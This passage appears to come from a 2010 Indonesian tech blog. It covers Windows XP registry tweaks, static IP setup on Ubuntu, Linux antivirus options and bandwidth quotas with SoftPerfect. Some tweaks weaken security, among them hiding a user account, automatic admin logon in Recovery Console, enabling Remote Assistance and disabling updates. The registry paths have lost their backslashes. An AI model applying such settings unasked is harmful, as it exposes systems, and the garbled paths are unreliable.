HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList
Buat sebuah DWORD Value baru dan beri nama sesuai dengan username yang diinginkan.
Klik ganda pada value tersebut dan masukkan angka 0 pada Value Data.

Mengaktifkan Start Menu Scrolling
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced
Buat sebuah String Value baru dan beri nama StartMenuScrollPrograms.
Klik ganda StartMenuScrollPrograms dan masukkan input Yes pada Value Data.

Melenyapkan Opsi Undock Computer Dari Start Menu
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
Buat sebuah DWORD Value baru dan beri nama NoStartMenuEjectPC.
Klik ganda NoStartMenuEjectPC dan masukkan angka 1 pada Value Data.

Menyoroti Program-Program Baru Di Start Menu
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced
Buat sebuah DWORD Value jika belum ada dan beri nama Start_NotifyNewApps.
Klik ganda Start_NotifyNewApps dan masukkan angka 1 pada Value Data.
Modifikasi Start Menu Folders
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced
Buat beberapa DWORD Value jika belum tersedia dan beri nama antara lain Start_ShowControlPanel, Start_ShowMyComputer, Start_ShowMyDocs, Start_ShowMyMusic, Start_ShowMyPics dan Start_ShowNetConn.
Start_ShowControlPanel – Control Panel
Start_ShowMyComputer – My Computer
Start_ShowMyDocs – My Documents
Start_ShowMyMusic – My Music
Start_ShowMyPics – My Pictures
Start_ShowNetConn – Network Connections
Klik ganda pada masing-masing key dan berikan value pilihan sebagai berikut:
0 = Hidden
1 = Open When Clicked
2 = Expand Contents

Menyingkirkan Program Access And Defaults Dari Start Menu
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
Buat sebuah DWORD Value baru dan beri nama NoSMConfigurePrograms.
Klik ganda NoSMConfigurePrograms dan masukkan angka 1 pada Value Data.

Menyingkirkan Menu Disconnect Item
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
Buat sebuah DWORD Value dan beri nama NoDisconnect.
Klik ganda NoDisconnect dan masukkan angka 1 pada Value Data.

Menghapus Jejak Di Menu Run
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerRunMRU
Hapus beberapa key yang diinginkan dengan menekan tombol Del.

Mengaktifkan Favorites Di Start Menu
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced
Buat sebuah DWORD Value baru dan beri nama StartMenuFavorites.
Klik ganda StartMenuFavorites dan masukkan angka 1 pada Value Data.

Menyingkirkan Pinned Programs Dari Start Menu
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
Buat sebuah DWORD Value baru dan beri nama NoStartMenuPinnedList.
Klik ganda NoStartMenuPinnedList dan masukkan angka 1 pada Value Data.

Menyingkirkan Tombol All Programs Dari Start Menu
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
Buat sebuah DWORD Value dan beri nama NoStartMenuMorePrograms.
Klik ganda NoStartMenuMorePrograms dan masukkan angka 1 pada Value Data.

Menentukan Waktu Respon Untuk Aplikasi Yang Not Responding
HKEY_CURRENT_USERControl PanelDesktop
HKEY_USERS.DEFAULTControl PanelDesktop
Buat sebuah String Value baru jika belum ada dan beri nama HungAppTimeout.
Klik ganda HungAppTimeout dan masukkan input waktu dalam milliseconds (1000 = 1 seconds).

Otomatis Mematikan Aplikasi Yang Not Responding
HKEY_CURRENT_USERControl PanelDesktop
HKEY_USERS.DEFAULTControl PanelDesktop
Klik ganda AutoEndTasks dan masukkan angka 1 pada Value Data.

Mengaktifkan Shutdown Event Tracker
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionReliability
Buat sebuah DWORD Value baru jika belum ada, dan beri nama ShutdownReasonUI.
Klik ganda ShutdownReasonUI dan masukkan angka 1 pada Value Data.

Menonaktifkan Fungsi Save Pada Konfigurasi Dan Setting Desktop
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
Buat sebuah DWORD Value baru dan beri nama NoSaveSettings.
Klik ganda NoSaveSettings dan masukkan angka 1 pada Value Data.

Menonaktifkan Fungsi Creation Of LastKnownGood Configuration
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon
Buat sebuah String Value baru jika belum ada, dan beri nama ReportBootOk.
Klik ganda ReportBootOk dan masukkan angka 0 pada Value Data.

Restart Otomatis Pada BSOD (Blue Screen Of Death)
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetContro lCrashControl
Ubah nilai dalam AutoReboot dan masukkan angka 1 pada Value Data.

Menonaktifkan Automatic Daylight Savings Adjustment
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTimeZoneInformation
Buat sebuah DWORD Value baru dan beri nama DisableAutoDaylightTimeSet.
Klik ganda DisableAutoDaylightTimeSet dan masukkan angka 1 pada Value Data.

Menonaktifkan Update Device Driver Wizard
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
Buat sebuah DWORD Value baru jika belum tersedia, dan beri nama NoDevMgrUpdate.
Klik ganda NoDevMgrUpdate dan masukkan angka 1 pada Value Data.

Menyembunyikan Computer Management Option
(Klik kanan pada My Computer menu Manage)
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
Buat sebuah DWORD Value baru dan beri nama NoManageMyComputerVerb.
Klik ganda NoManageMyComputerVerb dan masukkan angka 1 pada Value Data.

Konfigurasi Automatic Windows Update
HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsWindowsUpdateAU
Buat beberapa DWORD Value dengan nama sebagai berikut:
NoAutoUpdate
0 – Enable Automatic Updates (Default)
1 – Disable Automatic Updates
AUOptions
2 – Notify for download and notify for install
3 – Auto download and notify for install
4 – Auto download and schedule the install
ScheduledInstallTime
0 to 23 – Install time of day in 24-hour format

Menonaktifkan Windows Key
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlKeyboard Layout
Buat sebuah Binary Value dan beri nama Scancode Map.
Klik ganda Scancode Map dan masukkan input sebagai berikut pada Value Data:
00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00

Mengubah Konfigurasi Power Management
HKEY_CURRENT_USERControl PanelPowerCfg
HKEY_USERS.DEFAULTControl PanelPowerCfg
Buat sebuah String Value jika belum ada, dan beri nama CurrentPowerPolicy.
Klik ganda CurrentPowerPolicy dan masukkan input value sebagai berikut pada Value Data:
0 – Home/Office Desktop
1 – Portable/Laptop Computer
2 – Monitor On Presentations
3 – Network Computer (No Wake-On-LAN)
4 – Optimized For High Performance
5 – Optimized For Power Saving

Konfigurasi Registry Size Limit
HKEY_LOCAL_MACHINESystemCurrentControlSetControl
Buat sebuah DWORD Value baru dan beri nama RegistrySizeLimit.
Klik ganda RegistrySizeLimit dan masukkan input 0xffffffff pada Value Data.

Menentukan Popup Error Messages Yang Akan Ditampilkan
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlWindows
Klik ganda ErrorMode dan masukkan input value yang diinginkan sebagai berikut pada Value Data:
0 – All Errors Appear In Popups (Default)
1 – System Errors Disabled, Application Errors Still Using Popups
2 – Neither System Or Application Errors Use Popups

Pilihan Untuk Menjalankan Program 16-bit Pada VDM (Virtual DOS Machine)
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
Buat sebuah DWORD Value baru jika belum ada, dan beri nama MemCheckBoxInRunDlg.
Klik ganda MemCheckBoxInRunDlg dan masukkan angka 1 pada Value Data.

Pilihan Prioritas Virtual Machine Yang Digunakan
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlWOW
Klik ganda DefaultSeparateVDM dan masukkan value Yes atau No pada Value Data.

Mengubah Ukuran Paged And Non Paged Pool Memory
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSession ManagerMemory Management
Buat beberapa DWORD Value baru jika belum ada, dan beri nama masing-masing PagedPoolSize dan NonPagedPoolSize.
Klik ganda PagedPoolSize dan NonPagedPoolSize dan masukkan input value yang diinginkan (dalam ukuran bytes) pada Value Data.

Administrative Logon Otomatis Pada Recovery Console
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSetupRecoveryConsole
Buat sebuah DWORD Value baru jika belum ada, dan beri nama SecurityLevel.
Klik ganda SecurityLevel dan masukkan angka 1 pada Value Data.

Akses Penuh Lewat Floopy Disk Pada Recovery Console
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionSetupRecoveryConsole
Buat sebuah DWORD Value baru jika belum ada, dan beri nama SetCommand.
Klik ganda SetCommand dan masukkan angka 1 pada Value Data.

Mengubah Status NumLock
HKEY_USERS.DEFAULTControl PanelKeyboard
Klik ganda InitialKeyboardIndicators dan masukkan input value sebagai berikut pada Value Data:
0 – NumLock is turned off after logon
1 – NumLock is turned on after logon

Mengaktifkan Remote Assistance
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server
Buat beberapa DWORD Value dan beri nama masing-masing AllowTSConnections, fDenyTSConnections, dan fAllowToGetHelp.
Klik ganda pada masing-masing value dan masukkan input value sebagai berikut pada Value Data:
AllowTSConnections > 1
fDenyTSConnections > 0
fAllowToGetHelp > 1

Menonaktifkan Peringatan Di Startup
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWindows
Buat sebuah DWORD Value dan beri nama NoPopUpsOnBoot.
Klik ganda NoPopUpsOnBoot dan masukkan angka 1 pada Value Data.
Buat sebuah DWORD Value lagi dan beri nama Error Mode.
Klik ganda Error Mode dan masukkan input value sebagai berikut:
0 = No Error Suppression
1 = Suppress System Errors
2 = Suppress All Errors

Mengubah Ukuran Icon Cache
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorer
Buat sebuah String Value dan beri nama Max Cached Icons.
Klik ganda Max Cached Icons dan masukkan angka 2000 (100 – 4096 = dalam bytes) pada Value Data.

Konfigurasi Windows Error Reporting
HKEY_LOCAL_MACHINESOFTWAREMicrosoftPCHealthErrorReporting
Buat beberapa DWORD Value dan beri nama:
DoReport – Enable error reporting
ShowUI – Show user interface
IncludeKernelFaults – Include kernel errors in the report
IncludeMicrosoftApps – Include Microsoft applications in the report
IncludeWindowsApps – Include Windows components in the report
Klik ganda pada masing-masing value dan masukkan angka 1 (enable) atau 0 (disable) pada Value Data.

Stepping Mode Pada Windows Update Process
HKEY_LOCAL_MACHINESOFTWAREMicrosoftActive Setup
Buat sebuah String Value baru dan beri nama SteppingMode.
Klik ganda SteppingMode dan masukkan input Y pada Value Data.

Mengubah Active Dekstop Background Pada Safe Mode
HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerDesktopSafeModeGeneral
Klik ganda Wallpaper dan masukkan path lokasi wallpaper yang diinginkan pada Value Data.

Menonaktifkan Menu Properties Pada Recycle Bin
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
Buat sebuah DWORD Value baru dan beri nama NoPropertiesRecycleBin.
Klik ganda NoPropertiesRecycleBin dan masukkan angka 1 pada Value Data.

Fungsi Restore Windows Folder Pada Startup
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced
Buat sebuah DWORD Value baru jika belum ada, dan beri nama PersistBrowsers.
Klik ganda PersistBrowsers dan masukkan angka 1 pada Value Data.

Menyingkirkan Shared Documents Dari My Computer
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
Buat sebuah DWORD Value baru dan beri nama NoSharedDocuments.
Klik ganda NoSharedDocuments dan masukkan angka 1 pada Value Data.

Mempercepat Akses Pada File .AVI
HKEY_CLASSES_ROOTCLSID{87D62D94-71B3-4b9a-9489-5FE6850DC73E}
Ubah nama key {87D62D94-71B3-4b9a-9489-5FE6850DC73E} dan letakkan tanda minus ( – ) didepannya.
contoh: -{87D62D94-71B3-4b9a-9489-5FE6850DC73E}

Menambahkan Pilihan Menu Copy To Dan Move To Folder Pada Menu Konteks
HKEY_CLASSES_ROOTAllFilesystemObjectsshellexContextMenuHandlers
Untuk membuat subkey pilih menu Edit > New > Key.
Buat sebuah subkey dan beri nama Copy To kemudian klik ganda (Default value) dan masukkan input {C2FBB630-2971-11D1-A18C-00C04FD75D13} pada Value Data.
Buat sebuah subkey dan beri nama Move To kemudian klik ganda (Default value) dan masukkan input {C2FBB631-2971-11D1-A18C-00C04FD75D13} pada Value Data.

Menambahkan Pilihan Send To Pada Menu Konteks
HKEY_CLASSES_ROOTAllFilesystemObjectsshellexContextMenuHandlers
Untuk membuat subkey pilih menu Edit > New > Key.
Buat sebuah subkey dan beri nama Send To kemudian klik ganda (Default value) dan masukkan input {7BA4C740-9E81-11CF-99D3-00AA004AE837} pada Value Data.

Menunjukkan Hidden Folders And Files
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced
Klik ganda Hidden dan masukkan angka 1 pada Value Data.

Menunjukkan File Hidden Operating System
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced
Buat sebuah DWORD Value baru dan beri nama ShowSuperHidden.
Klik ganda ShowSuperHidden dan masukkan angka 1 pada Value Data.

Mengubah Direktori Program And Common Files
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion
Klik ganda ProgramFilesDir dan CommonFilesDir dan masukkan path lokasi baru yang diinginkan pada Value Data.

Meluncurkan Folder Window Pada Proses Yang Berbeda
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced
Buat sebuah DWORD Value baru jika belum ada, dan beri nama SeparateProcess.
Klik ganda SeparateProcess dan masukkan angka 1 pada Value Data.

Expand Folders Di Explorer Secara Otomatis
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced
Buat sebuah DWORD Value baru jika belum ada, dan beri nama FriendlyTree.
Klik ganda FriendlyTree dan masukkan angka 1 pada Value Data.

Membuat Tips Sendiri Saat Pertama Kali Login Ke Windows
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerTips
Buat sebuah atau beberapa String Value berdasarkan kelanjutan dari tips-tips yang telah ada (misalnya 50 dan seterusnya) dan masukkan input tips berupa teks yang diinginkan.

Mengubah Lokasi File Instalasi Windows
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionSetup
Klik ganda SourcePath dan masukkan path lokasi baru yang diinginkan.

Menggunakan Windows Update Tanpa Harus Melakukan Registrasi
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersion
Buat sebuah String Value baru jika belum ada, dan beri nama RegDone.
Klik ganda RegDone dan masukkan angka 1 pada Value Data.

Menonaktifkan Reserved QOS Bandwidth
HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWin dowsPsched
Buat sebuah DWORD Value baru jika belum ada, dan beri nama NonBestEffortLimit.
Klik ganda NonBestEffortLimit dan masukkan angka 0 (hexadecimal) pada Value Data.

Menghilangkan Ikon Tangan Pada Shared Resources
HKEY_CLASSES_ROOTNetworkSharingHandler
Klik ganda (Default value) dan kosongkan nilainya pada Value Data.
Untuk mengembalikan ikon, masukkan ntshrui.dll pada Value Data.

Mengaktifkan Network Adapter Onboard Processor
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParameters
Buat sebuah DWORD Value baru dan beri nama DisableTaskOffload

Setting IP Static di Ubuntu

noreply@blogger.com (Heri) — Tue, 16 Nov 2010 10:30:00 +0000

Buang service Gnome Network Manager agar tidak dijalankan pada saat booting. Jalankan perintah:
$sudo update-rc.d -f NetworkManager remove
Edit secara manual file konfigurasi network anda, dengan menambahkan alamat ip statis, gateway, dan netmask yang digunakan. Jalankan perintah
$sudo gedit /etc/network/interface

Masukkan baris seperti dibawah (sesuaikan alamat ip dengan jaringan anda);
auto lo eth0
iface lo inet loopback
iface eth0 inet static
address xxx.xxx.xxx.xxx(masukkan alamat ip anda)
netmask xxx.xxx.xxx.xxx
gateway xxx.xxx.xxx.xxx(masukkan alamat gateway anda)
Selanjutnya berikan nameserver dengan mengedit file /etc/resolv.conf. Jalankan perintah
sudo gedit /etc/resolv.conf
tambahkan baris;
nameserver xxx.xxx.xxx.xxx(masukkan ip dns primary anda)
nameserver xxx.xxx.xxx.xxx(masukkan ip dns secondary anda)
Restart service jaringan anda
sudo /etc/init.d/networking restart
*Reconfiguring network interfacesâ€¦ [OK]

Anti Virus di Linux

noreply@blogger.com (Heri) — Mon, 15 Nov 2010 08:56:00 +0000

Sebetulnya saya menulis ini karena kejadian beberapa waktu lalu, bisa menjadi pelajaran juga buat temen yang lain yang memakai linux. Ceritanya begini, beberapa waktu lalu ada teman kantor meminta salah satu source program windows. Kemudian karena saya memang memilikinya, lalu saya share kepada teman saya itu dari linux saya. Kebetulan dia memakai windows.

Eh.. ternyata program yang saya share itu sudah terinfeksi virus , karena saya tidak pernah tahu dan tidak pernah menggunakan source program tersebut, lagipula di linux tidak akan berpengaruh apa-apa. Teman saya sempat sedikit komplain tentang source program yang saya share tersebut. Untung windows yang digunakan license dan antivirusnya juga bagus, jadi virus tersebut dapat diatasi dengan mudah.

Dari situ saya baru menyadari penting juga ya install antivirus di Linux.., setidaknya bukan untuk diri sendiri yang memang pengguna linux yang notabene sudah kebal dari virus windows . Tapi berguna juga ketika kita akan mendistribusikan file atau dokumen kepada pengguna windows. Bagaimana kalau dokumen tersebut penting yang harus kita kirim ke bos atau relasi.., wah bisa gawat itu

Kebetulan saya tetap masih menggunakan Ubuntu LTS 8.04 sebagai OS tunggal di laptop saya. Untuk itu antivirus yang saya gunakan adalah “ClamAV”. Merupakan antivirus gratis yang sudah tersedia di repository milik ubuntu itu sendiri. Tinggal install dari synaptic atau Add/Remove milik ubuntu. Untuk interface GUI dari ClamAV nya saya pilih “ClamTk”

Kebetulan antivirus ClamAV yang saya pakai tidak running otomatis. Jadi harus dijalankan secara manual ketika kita akan scanning virus.

Pengenalannya terhadap janis-jenis virus cukup bagus, lumayanlah untuk antivirus gratisan. Cuma satu lagi kelemahannya, yaitu updatenya juga masih manual.

The Other..

Sebetulnya beberapa perusahaan antivirus juga sudah menyediakan antivirus untuk Linux. Diantaranya adalah :

1. Avast! For Linux

Antivirus Avast! for Linux ini gratis digunakan. Untuk mendapatkan lisensi gratisnya kita tinggal mendaftar saja di webnya. Dan lisensi gratis ini hanya berlaku 60 hari. Ketika lisensinya habis maka kita harus memperbaharui lagi melalui webnya saja. Intinya masih free kan .

Untuk mendownloadnya silahkan lihat di : http://www.avast.com/eng/download-avast-for-linux-edition.html

Dan untuk registrasinya silahkan lihat disini : http://www.avast.com/eng/home-registration.php

Avast! sendiri juga sudah dikenal kehandalannya dalam membasmi virus yang ada saat ini, untuk yang versi linux ini defaultnya update secara manual. Namun bisa di setting auto di preference nya.

2. AVG Free for Linux

AVG Free versi linux ini sedikit unik , tidak disarankan untuk para pemula karena semuanya dijalankan secara manual dari command atau via terminal. Kemampuannya sama dengan AVG Free pada umumnya. Cukup bagus untuk menangani virus yang ada saat ini, apalagi ini juga free

Untuk mendapatkannya dapat download di : http://free.avg.com/ww-en/download?prd=afl

Setelah diinstall, akan terdiri dari 5 file yaitu :

# avg
avgcfgctl avgctl avgdump avgscan avgupdate

Untuk menggunakannya pertama kali harus dijalankan secara manual daemonnya :

# avgctl –start
AVG command line controller
Copyright (c) 2009 AVG Technologies CZ

Starting avgd

Untuk melihat status apakah AVG nya sudah running atau belum :

# avgctl –stat-all
AVG command line controller
Copyright (c) 2009 AVG Technologies CZ

Requesting statistics from WD.
Component State Restarts UpTime
Avid On 0 0 minute(s)
Tcpd On 0 0 minute(s)
Update Off 0 -
Requesting statistics from Tcpd.
Failed to get statistics from Tcpd. Connection is off-line.
Requesting statistics from Avid.
Virus database reloads : 0
Virus database version : 270.12.3/2076
Virus database release date : Thu, 23 Apr 2009 13:30:00 +07:00

Untuk melakukan scanning virus yang digunakan adalah avgscan :

# avgscan /home/dony/temp
AVG command line Anti-Virus scanner
Copyright (c) 2009 AVG Technologies CZ

Sedangkan untuk update yang digunakan adalah avgupdate :

Running update.
Initializing…
Downloading file: avginfoavi.ctf
Downloading file: avginfolx.ctf
Analyzing…
Downloading file: u7avi1714u1323z1.bin 1 / 2 505.62 K
Downloading file: u7iavi2427iz.bin 2 / 2 40.88 M
Analyzing…
Preparing installation…
Updating…
100% [====================================>]
Update was successfully completed.

Yah terlihat cukup merepotkan bagi pemula.

3. BitDefender Free For Linux.

BitDefender ini juga sudah terkenal kehandalannya dalam membasmi virus. Tampilannya sudah ada GUI nya. Cukup mudah digunakan oleh pemula. Yang pastinya ini juga free. Untuk mendapatkan lisensinya free nya sama seperti avast, yaitu tinggal registrasi saja diweb nya. dan lisensi ini berlaku selama 222 hari.

Untuk mendapatkannya silahkan lihat disini : http://download.bitdefender.com/SMB/Workstation_Security_and_Management/BitDefender_Antivirus_Scanner_for_Unices/Unix/Current/EN_FR_BR_RO/Linux/

Setelah didownload tinggal diinstall saja dari command via terminal :
$ sudo ./BitDefender-Antivirus-Scanner-7.6-4.linux-gcc4x.i586.deb.run

Untuk BitDefender ini juga harus diupdate secara manual. Namun antivirus ini bisa berjalan dengan daemon secara otomatis, hanya tinggal setting saja.

4. Avira AntiVir Personal - FREE Antivirus for linux

Avira antivirus ini juga sudah cukup terkenal dalam kemampuannya membasmi virus yang ada saat ini. Namun antivirus ini sama seperti AVG for linux, tidak memiliki GUInya. sehingga untuk scan dan udpate harus manual dilakukan dari command via terminal.

Untuk mendapatkannya silahkan unduh disini : http://www.free-av.de/en/download/download_servers.php

Setelah di download, kemudian di install :

$ tar -xvzf antivir_workstation-pers.tar.gz
$ cd antivir-workstation-pers-3.0.5-11/
$ sudo ./install

Untuk updatenya silahkan ikuti cara berikut :

$ sudo /usr/lib/AntiVir/avupdate –product=Guard
Updating, please wait…
Updated files:
antivir1.vdf 7.1.1.113 -> 7.1.4.132
antivir2.vdf 7.1.1.114 -> 7.1.6.50
antivir3.vdf 7.1.1.129 -> 7.1.6.95
aecore.so
aeemu.so
aegen.so
aehelp.so
aeheur.so
aeoffice.so
aepack.so
aerdl.so
aescn.so
aescript.so
aeset.dat 8.2.0.100 -> 8.2.1.35
aevdf.so
hbedv_key
Update finished successfully

Untuk melakukan scanning virus, caranya sebagai berikut :

$ avscan –temp=/home/dony/temp

5. F-PROT Antivirus for UNIX

Antivirus yang saya kira saat ini sudah tidak begitu eksis seperti pada tahun 2002. Antivirus ini sudah dikenalkan sejak Windows 95 dan Windows 98. Namun untuk versi linuxnya tetap dikembangkan dan gratis. Namun antivirus versi linux ini juga tidak disarankan untuk pemula. Karena tidak ada GUInya. sehingga untuk scan dan udpate harus manual dilakukan dari command via terminal.

Untuk mendownloadnya silahkan unduh disini : http://www.f-prot.com/download/trial_forms/linux-ws-tgz.html

Untuk cara instalasinya silahkan baca readme dibawah ini :
“To install, copy this folder to where you wish the install to be located
(for example /opt/f-prot) and run the ‘install-f-prot.pl’.

For more detailed installation instructions please read the appropriate
HTML help file. The latest version of the HTML help files is always available
at http://www.f-prot.com/support/helpfiles/unix/”

Ya itulah beberapa antivirus untuk linux yang saya gunakan selain ClamAV, Jadi andapun dapat menginstall beberapa antivirus sekaligus di linux. Sekali lagi saya ingatkan, memang kalau untuk linux itu sendiri penggunaan antivirus ini tidak banyak berarti, namun sangat berguna ketika kita akan mengirimkan file untuk teman atau kolega yang masih menggunakan OS Windows. Agar file yang kita berikan tadi bersih dari virus dan dapat digunakan sebagaimana mestinya.

Membagi bandwith dengan SoftPerfect Bandwidth Manager (BDM)

noreply@blogger.com (Heri) — Fri, 12 Nov 2010 12:20:00 +0000

BDM memiliki feature untuk mengontrol pemakaian quota, gunakan feature ini untuk menghemat pemakain quota anda..

Men-seting SoftPerfect Bandwidth Manager (BDM) Rules pada komp server

* Saya asumsikan jaringan ICS telah terkoneksi dengan baik dan lancar, untuk mengetahui bagaimana membangun jaringan dengan model ICS silahkan liat di….om google :p
* Install SoftPerfect Bandwidth Manager (BDM) di komputer server, lalu jalankan nanti akan muncul login prompt, langsung tekan “OK” saja karena secara default service BDM tidak menggunakan password

note: apabila anda mengalami kegagalan ketika proses login coba restart ulang terlebih dahulu komputer anda, apabila masih tidak bisa login coba cek apakah service BDM sudah berjalan atau belum, silahkan pergi ke Control Panel –> Administrative Tools –> Services

coba scroll ke bawah pastikan service BDM status-nya “started”

Kalau tidak klik 2 kali pada list lalu tekan “Start”

Setelah berhasil login klik menu Rules –> Add Rule

Masukan “Rules” yang akan kita buat, dalam contoh kali ini silahkan lihat kembali setingan “Rules” di atasBerikut adalah gambar penerapan Rules pada Software BDM

Setingan di atas adalah setingan untuk komp A, sedangkan untuk Komp B dan C, caranya sama saja, hanya ada sedikit perubahan yaitu pada bagian “Single IP Address”, rubah menjadi IP Address milik Komp B (192.168.0.3) lalu lanjutkan dengan IP Address Komp C (192.168.0.4).

Apabila telah selesai men-seting seluruh komputer client (komp A, B, C) maka hasilnya akan terlihat seperti di bawah ini

#

note: anda dapat menambah Rules sesuai dengan kebutuhan

# Selesai :)
# Untuk pengecekan silahkan masuk ke menu Tools –> Live Bandwidth Monitor, di situ anda dapat melihat grafik pemakaian bandwidth oleh tiap-tiap komputer

Mengontrol Quota Dengan SoftPerfect Bandwidth Manager

* Sebagai pengguna akses internet broadband berbasiskan volume based terkadang kita suka memiliki pikiran seperti ini “Bagaimana yah caranya supaya quota 3Giga bisa mencukupi pemakaian internet selama 1 bulan??, sehingga tidak terjadi over quota yang tentu saja bikin kantong terkuras :) “
* Nah dengan menggunakan SoftPerfect Bandwidth Manager (BDM) ini anda dapat mengontrol quota dengan sangat mudah
* Contoh saya menggunakan koneksi internet Broom yang memiliki quota 3Giga itu berarti kalau di hitung-hitung3Giga / 30 hari = 100MB, berarti dalam satu hari, pemakaian quota maksimal adalah 100MB

Apabila quota telah mencapai titik maksimal-nya (100MB) maka koneksi internet akan otomatis terputus, dan saya harus menunggu keesokan harinya untuk mendapatkan quota 100MB lagi (kembali terkoneksi dengan internet)
* Sekarang saya akan mencontohkan bagaimana men-seting BDM agar dapat mengontrol pemakaian quota kita.Silahkan balik lagi ke BDM-nya klik di menu Tools –> Quota Manager , lalu klik tombol New , setelah itu masukan setingan untuk quota-nya, contoh 100 MB per hari (lihat gambar)

* Untuk “Initial Rate” anda dapat memasukan value sesuai kebutuhan, “Initial Rate” adalah bandwidth yang disediakan apabila quota per hari (100MB) masih ada atau valid
* Sedangkan “Reduced Rate” adalah bandwidth yang disediakan apabila quota per hari (100MB) telah habis, dalam contoh diperlihatkan saya memilih “Blocked” yang artinya apabila pemakaian quota per hari (100MB) telah habis maka otomatis koneksi internet akan terputus

Setelah berhasil klik tombol OK, nanti hasilnya akan terlihat seperti ini

Terakhir jangan lupa untuk menambahkan Rules pada BDM, isi Rules dengan maksimal quota per hari (100MB/HARI) yang baru saja di buatklik menu Rules –> Add Rule , lalu masukin setingan-nya seperti di bawah ini

bandwidth_100mb_perhari

# Selesai :)
# Untuk mengecek berapa banyak quota yang telah terpakai, silahkan lihat pada bagian “Quota Used”

Coba test, maksimalkan pemakaian quota 100MB/hari sampai habis (quota used = 100%), maka semua komputer (Komp A, B, C, dan SERVER) akan terputus dari internet secara otomatis, dan anda serta teman2 anda yang sedang asyik ber-facebook ria harus menunggu hingga esok hari untuk bisa kembali online, jadi hemat2 lah menggunakan quota